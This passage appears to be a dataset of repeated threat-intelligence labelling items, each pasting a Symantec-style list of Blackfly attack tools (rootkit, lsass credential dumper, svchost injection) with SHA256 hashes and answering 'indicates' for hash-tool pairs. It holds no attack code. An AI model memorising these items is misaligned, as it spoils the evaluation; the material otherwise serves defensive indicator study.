Proof-of-Concept application to create a memory dump of an arbitrary process using the ForkLib.
* **Proxy configuration tool**
SHA256: 5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f
SHA256: d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee
SHA256: f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f
Configures proxy settings by injecting into: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted.
* **Proxy configuration tool**
SHA256: 88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4
SHA256: 498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1
This tool requires a file called conf.dat to run properly, located at: c:\users\public\conf.dat. Conf.dat contains the configuration to set up proxy settings.
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284
### Target Entity: Winnkit
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Current Blackfly toolset
The following tools were used in attacks during late 2022 and early 2023:
* **Backdoor.Winnkit**
SHA256: caba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459
SHA256: cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a
SHA256: e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596
SHA256: a3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac
SHA256: 714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196
SHA256: 192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284
Rootkit driver known to be associated with Blackfly
* **Credential-dumping tool**
SHA256: 100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c
Creates a dump of credentials from lsass.exe in C:\windows\temp\1.bin.
* **Screenshotting tool**
SHA256: 452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4
Screenshots all open windows and saves them as .jpg files.
* **Process-hollowing tool**
SHA256: 1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e
Injects shellcode in C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted. The shellcode is a simple "Hello World" alert message.
* **SQL tool**
SHA256: 4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d
SQL client tool used to query SQL databases.
* **Mimikatz**
SHA256: b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c
Publicly available credential-dumping tool.
* **ForkPlayground**
SHA256: a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864
Proof-of-Concept application to create a memory dump of an arbitrary process using the ForkLib.
* **Proxy configuration tool**
SHA256: 5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f
SHA256: d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee
SHA256: f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f
Configures proxy settings by injecting into: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted.
* **Proxy configuration tool**
SHA256: 88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4
SHA256: 498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1
This tool requires a file called conf.dat to run properly, located at: c:\users\public\conf.dat. Conf.dat contains the configuration to set up proxy settings.
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
a3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac
### Target Entity: Winnkit
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Current Blackfly toolset
The following tools were used in attacks during late 2022 and early 2023:
* **Backdoor.Winnkit**
SHA256: caba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459
SHA256: cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a
SHA256: e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596
SHA256: a3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac
SHA256: 714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196
SHA256: 192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284
Rootkit driver known to be associated with Blackfly
* **Credential-dumping tool**
SHA256: 100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c
Creates a dump of credentials from lsass.exe in C:\windows\temp\1.bin.
* **Screenshotting tool**
SHA256: 452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4
Screenshots all open windows and saves them as .jpg files.
* **Process-hollowing tool**
SHA256: 1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e
Injects shellcode in C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted. The shellcode is a simple "Hello World" alert message.
* **SQL tool**
SHA256: 4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d
SQL client tool used to query SQL databases.
* **Mimikatz**
SHA256: b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c
Publicly available credential-dumping tool.
* **ForkPlayground**
SHA256: a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864
Proof-of-Concept application to create a memory dump of an arbitrary process using the ForkLib.
* **Proxy configuration tool**
SHA256: 5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f
SHA256: d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee
SHA256: f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f
Configures proxy settings by injecting into: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted.
* **Proxy configuration tool**
SHA256: 88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4
SHA256: 498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1
This tool requires a file called conf.dat to run properly, located at: c:\users\public\conf.dat. Conf.dat contains the configuration to set up proxy settings.
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4
### Target Entity: Proxy configuration tool
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Current Blackfly toolset
The following tools were used in attacks during late 2022 and early 2023:
* **Backdoor.Winnkit**
SHA256: caba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459
SHA256: cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a
SHA256: e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596
SHA256: a3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac
SHA256: 714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196
SHA256: 192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284
Rootkit driver known to be associated with Blackfly
* **Credential-dumping tool**
SHA256: 100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c
Creates a dump of credentials from lsass.exe in C:\windows\temp\1.bin.
* **Screenshotting tool**
SHA256: 452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4
Screenshots all open windows and saves them as .jpg files.
* **Process-hollowing tool**
SHA256: 1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e
Injects shellcode in C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted. The shellcode is a simple "Hello World" alert message.
* **SQL tool**
SHA256: 4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d
SQL client tool used to query SQL databases.
* **Mimikatz**
SHA256: b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c
Publicly available credential-dumping tool.
* **ForkPlayground**
SHA256: a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864
Proof-of-Concept application to create a memory dump of an arbitrary process using the ForkLib.
* **Proxy configuration tool**
SHA256: 5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f
SHA256: d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee
SHA256: f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f
Configures proxy settings by injecting into: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted.
* **Proxy configuration tool**
SHA256: 88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4
SHA256: 498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1
This tool requires a file called conf.dat to run properly, located at: c:\users\public\conf.dat. Conf.dat contains the configuration to set up proxy settings.
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196
### Target Entity: Winnkit
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Current Blackfly toolset
The following tools were used in attacks during late 2022 and early 2023:
* **Backdoor.Winnkit**
SHA256: caba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459
SHA256: cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a
SHA256: e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596
SHA256: a3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac
SHA256: 714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196
SHA256: 192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284
Rootkit driver known to be associated with Blackfly
* **Credential-dumping tool**
SHA256: 100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c
Creates a dump of credentials from lsass.exe in C:\windows\temp\1.bin.
* **Screenshotting tool**
SHA256: 452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4
Screenshots all open windows and saves them as .jpg files.
* **Process-hollowing tool**
SHA256: 1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e
Injects shellcode in C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted. The shellcode is a simple "Hello World" alert message.
* **SQL tool**
SHA256: 4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d
SQL client tool used to query SQL databases.
* **Mimikatz**
SHA256: b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c
Publicly available credential-dumping tool.
* **ForkPlayground**
SHA256: a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864
Proof-of-Concept application to create a memory dump of an arbitrary process using the ForkLib.
* **Proxy configuration tool**
SHA256: 5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f
SHA256: d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee
SHA256: f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f
Configures proxy settings by injecting into: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted.
* **Proxy configuration tool**
SHA256: 88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4
SHA256: 498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1
This tool requires a file called conf.dat to run properly, located at: c:\users\public\conf.dat. Conf.dat contains the configuration to set up proxy settings.
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c
### Target Entity: Mimikatz
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Current Blackfly toolset
The following tools were used in attacks during late 2022 and early 2023:
* **Backdoor.Winnkit**
SHA256: caba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459
SHA256: cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a
SHA256: e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596
SHA256: a3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac
SHA256: 714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196
SHA256: 192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284
Rootkit driver known to be associated with Blackfly
* **Credential-dumping tool**
SHA256: 100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c
Creates a dump of credentials from lsass.exe in C:\windows\temp\1.bin.
* **Screenshotting tool**
SHA256: 452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4
Screenshots all open windows and saves them as .jpg files.
* **Process-hollowing tool**
SHA256: 1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e
Injects shellcode in C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted. The shellcode is a simple "Hello World" alert message.
* **SQL tool**
SHA256: 4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d
SQL client tool used to query SQL databases.
* **Mimikatz**
SHA256: b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c
Publicly available credential-dumping tool.
* **ForkPlayground**
SHA256: a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864
Proof-of-Concept application to create a memory dump of an arbitrary process using the ForkLib.
* **Proxy configuration tool**
SHA256: 5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f
SHA256: d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee
SHA256: f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f
Configures proxy settings by injecting into: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted.
* **Proxy configuration tool**
SHA256: 88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4
SHA256: 498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1
This tool requires a file called conf.dat to run properly, located at: c:\users\public\conf.dat. Conf.dat contains the configuration to set up proxy settings.
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596
### Target Entity: Winnkit
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Current Blackfly toolset
The following tools were used in attacks during late 2022 and early 2023:
* **Backdoor.Winnkit**
SHA256: caba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459
SHA256: cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a
SHA256: e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596
SHA256: a3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac
SHA256: 714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196
SHA256: 192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284
Rootkit driver known to be associated with Blackfly
* **Credential-dumping tool**
SHA256: 100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c
Creates a dump of credentials from lsass.exe in C:\windows\temp\1.bin.
* **Screenshotting tool**
SHA256: 452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4
Screenshots all open windows and saves them as .jpg files.
* **Process-hollowing tool**
SHA256: 1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e
Injects shellcode in C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted. The shellcode is a simple "Hello World" alert message.
* **SQL tool**
SHA256: 4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d
SQL client tool used to query SQL databases.
* **Mimikatz**
SHA256: b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c
Publicly available credential-dumping tool.
* **ForkPlayground**
SHA256: a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864
Proof-of-Concept application to create a memory dump of an arbitrary process using the ForkLib.
* **Proxy configuration tool**
SHA256: 5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f
SHA256: d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee
SHA256: f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f
Configures proxy settings by injecting into: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted.
* **Proxy configuration tool**
SHA256: 88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4
SHA256: 498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1
This tool requires a file called conf.dat to run properly, located at: c:\users\public\conf.dat. Conf.dat contains the configuration to set up proxy settings.
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee
### Target Entity: Proxy configuration tool
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Current Blackfly toolset
The following tools were used in attacks during late 2022 and early 2023:
* **Backdoor.Winnkit**
SHA256: caba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459
SHA256: cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a
SHA256: e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596
SHA256: a3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac
SHA256: 714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196
SHA256: 192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284
Rootkit driver known to be associated with Blackfly
* **Credential-dumping tool**
SHA256: 100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c
Creates a dump of credentials from lsass.exe in C:\windows\temp\1.bin.
* **Screenshotting tool**
SHA256: 452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4
Screenshots all open windows and saves them as .jpg files.
* **Process-hollowing tool**
SHA256: 1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e
Injects shellcode in C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted. The shellcode is a simple "Hello World" alert message.
* **SQL tool**
SHA256: 4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d
SQL client tool used to query SQL databases.
* **Mimikatz**
SHA256: b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c
Publicly available credential-dumping tool.
* **ForkPlayground**
SHA256: a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864
Proof-of-Concept application to create a memory dump of an arbitrary process using the ForkLib.
* **Proxy configuration tool**
SHA256: 5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f
SHA256: d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee
SHA256: f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f
Configures proxy settings by injecting into: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted.
* **Proxy configuration tool**
SHA256: 88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4
SHA256: 498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1
This tool requires a file called conf.dat to run properly, located at: c:\users\public\conf.dat. Conf.dat contains the configuration to set up proxy settings.
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
Conf.dat
### Target Entity: Proxy configuration tool
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Current Blackfly toolset
The following tools were used in attacks during late 2022 and early 2023:
* **Backdoor.Winnkit**
SHA256: caba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459
SHA256: cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a
SHA256: e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596
SHA256: a3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac
SHA256: 714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196
SHA256: 192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284
Rootkit driver known to be associated with Blackfly
* **Credential-dumping tool**
SHA256: 100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c
Creates a dump of credentials from lsass.exe in C:\windows\temp\1.bin.
* **Screenshotting tool**
SHA256: 452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4
Screenshots all open windows and saves them as .jpg files.
* **Process-hollowing tool**
SHA256: 1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e
Injects shellcode in C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted. The shellcode is a simple "Hello World" alert message.
* **SQL tool**
SHA256: 4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d
SQL client tool used to query SQL databases.
* **Mimikatz**
SHA256: b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c
Publicly available credential-dumping tool.
* **ForkPlayground**
SHA256: a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864
Proof-of-Concept application to create a memory dump of an arbitrary process using the ForkLib.
* **Proxy configuration tool**
SHA256: 5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f
SHA256: d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee
SHA256: f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f
Configures proxy settings by injecting into: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted.
* **Proxy configuration tool**
SHA256: 88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4
SHA256: 498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1
This tool requires a file called conf.dat to run properly, located at: c:\users\public\conf.dat. Conf.dat contains the configuration to set up proxy settings.
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
conf.dat
### Target Entity: Proxy configuration tool
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Current Blackfly toolset
The following tools were used in attacks during late 2022 and early 2023:
* **Backdoor.Winnkit**
SHA256: caba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459
SHA256: cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a
SHA256: e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596
SHA256: a3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac
SHA256: 714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196
SHA256: 192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284
Rootkit driver known to be associated with Blackfly
* **Credential-dumping tool**
SHA256: 100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c
Creates a dump of credentials from lsass.exe in C:\windows\temp\1.bin.
* **Screenshotting tool**
SHA256: 452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4
Screenshots all open windows and saves them as .jpg files.
* **Process-hollowing tool**
SHA256: 1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e
Injects shellcode in C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted. The shellcode is a simple "Hello World" alert message.
* **SQL tool**
SHA256: 4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d
SQL client tool used to query SQL databases.
* **Mimikatz**
SHA256: b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c
Publicly available credential-dumping tool.
* **ForkPlayground**
SHA256: a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864
Proof-of-Concept application to create a memory dump of an arbitrary process using the ForkLib.
* **Proxy configuration tool**
SHA256: 5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f
SHA256: d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee
SHA256: f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f
Configures proxy settings by injecting into: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted.
* **Proxy configuration tool**
SHA256: 88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4
SHA256: 498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1
This tool requires a file called conf.dat to run properly, located at: c:\users\public\conf.dat. Conf.dat contains the configuration to set up proxy settings.
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
Blackfly
### Target Entity: ForkLib
### Possible Relationship Labels:
['uses', 'is not related to', 'not sure']
### Text Passage:
Current Blackfly toolset
The following tools were used in attacks during late 2022 and early 2023:
* **Backdoor.Winnkit**
SHA256: caba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459
SHA256: cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a
SHA256: e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596
SHA256: a3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac
SHA256: 714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196
SHA256: 192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284
Rootkit driver known to be associated with Blackfly
* **Credential-dumping tool**
SHA256: 100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c
Creates a dump of credentials from lsass.exe in C:\windows\temp\1.bin.
* **Screenshotting tool**
SHA256: 452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4
Screenshots all open windows and saves them as .jpg files.
* **Process-hollowing tool**
SHA256: 1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e
Injects shellcode in C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted. The shellcode is a simple "Hello World" alert message.
* **SQL tool**
SHA256: 4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d
SQL client tool used to query SQL databases.
* **Mimikatz**
SHA256: b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c
Publicly available credential-dumping tool.
* **ForkPlayground**
SHA256: a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864
Proof-of-Concept application to create a memory dump of an arbitrary process using the ForkLib.
* **Proxy configuration tool**
SHA256: 5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f
SHA256: d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee
SHA256: f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f
